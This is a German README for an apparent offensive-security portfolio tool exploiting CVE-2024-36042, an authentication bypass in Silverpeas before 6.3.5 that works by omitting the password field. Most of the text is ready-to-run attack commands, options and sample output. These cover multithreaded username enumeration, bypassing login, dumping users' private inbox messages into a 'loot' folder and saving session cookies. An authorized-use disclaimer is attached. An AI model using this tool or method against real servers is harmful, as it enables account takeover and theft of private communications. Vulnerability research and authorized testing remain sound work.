
Python PoC für CVE-2024-36042 Authentifizierungsumgehung in Silverpeas < 6.3.5. Bietet Versionserkennung, Multi-Thread-Benutzeraufzählung, Nachrichtenextraktion und strukturierte Berichterstattung für autorisierte Sicherheitstests.
Ein sauberer, professioneller Python3-Proof-of-Concept für CVE-2024-36042 – eine Authentifizierungsumgehung in Silverpeas < 6.3.5, die durch fehlende Passwortvalidierung in
AuthenticationServletverursacht wird.
Silverpeas AuthenticationServlet akzeptiert eine Anmeldeanfrage selbst dann, wenn der Parameter Password im POST-Body fehlt, und gewährt so authentifizierten Sitzungszugriff auf jeden bekannten Benutzernamen. Dieses Tool demonstriert die Schwachstelle verantwortungsbewusst mittels eines modularen, threadbasierten Exploit-Frameworks mit erweiterter Aufklärung, Datenextraktion und professioneller Berichtserstellung.
Betroffen: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://ZIEL:8080 --dump-messages
python3 CVE-2024-36042.py -t http://ZIEL:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://ZIEL:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./beute
python3 CVE-2024-36042.py -t http://ZIEL:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://ZIEL:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
Das Tool unterstützt vier primäre Ausgabemodi für gedumpte Nachrichten via --message-output:
console (Standard): Gibt bereinigte Nachrichten direkt im Terminal mit Hervorhebung von Schlüsselwörtern aus.markdown: Erzeugt einen einzelnen {benutzername}_messages.md-Bericht pro Konto im Ausgabeverzeichnis.files: Erstellt einen Ordner pro Konto und speichert jede Nachricht als einzelne Datei (z. B. message_0006.md) mit nullgepolsterten IDs für eine saubere Sortierung im Dateisystem.both: Kombiniert die Modi console und markdown.ausgabe/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optional: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Basis-URL von Silverpeas (erforderlich)
-u, --user Einzelner Benutzername als Ziel
--userlist Datei mit einem Benutzernamen pro Zeile
--dump-messages Nachrichten im Posteingang scrapen und anzeigen
--max-id Maximale Nachrichten-ID zum Prüfen (Standard: 50)
--threads Gleichzeitige Worker (Standard: 5)
--proxy HTTP-Proxy-URL
--message-output Ausgabemodus: {console, markdown, files, both}
--output-format Dateiformat: {md, txt}
--json Vollständigen JSON-Bericht exportieren
--csv CSV der gescrapten Nachrichten exportieren
--outdir Ausgabeverzeichnis für Exporte
--no-color ANSI-Farbausgabe deaktivieren (nützlich für Logs)
--save-raw-html Ursprüngliche HTML-Antworten zum Debuggen speichern
--check-version Nur Version ermitteln (Fingerabdruck)
--no-exploit Ausnutzung überspringen (mit --check-version kombinieren)
--quiet, -q Minimale Ausgabe
--no-banner Banner unterdrücken
[*] Ziel : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - anfällig.
[*] Versuche: scr1ptkiddy
[+] UMGEHEN -> scr1ptkiddy
[+] Daten gespeichert unter ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Ausführungszusammenfassung
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Konto │ Status │ Nachrichten │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ ERFOLG │ 6 │
│ admin │ FEHLGESCHLAGEN │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON-Bericht -> ./report_20260516_013210.json
Dieses Repository ist Teil meines Offensive-Security-Portfolios. Es demonstriert:
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests, Forschung und Bildungszwecke bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie stets die ausdrückliche Erlaubnis ein, bevor Sie eine Infrastruktur testen, die Ihnen nicht gehört.
MIT
| Funktion | Beschreibung |
|---|
| Versionserkennung | Fingerabdruck der Silverpeas-Version und des Schwachstellenstatus vor der Ausnutzung. |
| Multithreaded | Gleichzeitige Benutzerenumeration via ThreadPoolExecutor mit threadsicherer Ausgabe. |
| Erweiterte Erkennung | Mehrsprachige (Englisch/Französisch) Endpunkt-Erkennung mit Multi-ID-Sondierung. |
| Datenextraktion | Hochgenaues Nachrichten-Dumping mit Deduplizierung und Filterung von Standardtexten. |
| Flexible Ausgabe | Unterstützung für Konsole, Markdown-Berichte und einzelne Dateiexporte (.md oder .txt). |
| Proxy & Debugging | Routen durch Burp/ZAP (--proxy) und Speichern von rohem HTML zum Parser-Debugging. |
| Saubere UX | ASCII-Zusammenfassungstabellen, Hervorhebung von Schlüsselwörtern und optionale ANSI-Farbsteuerung. |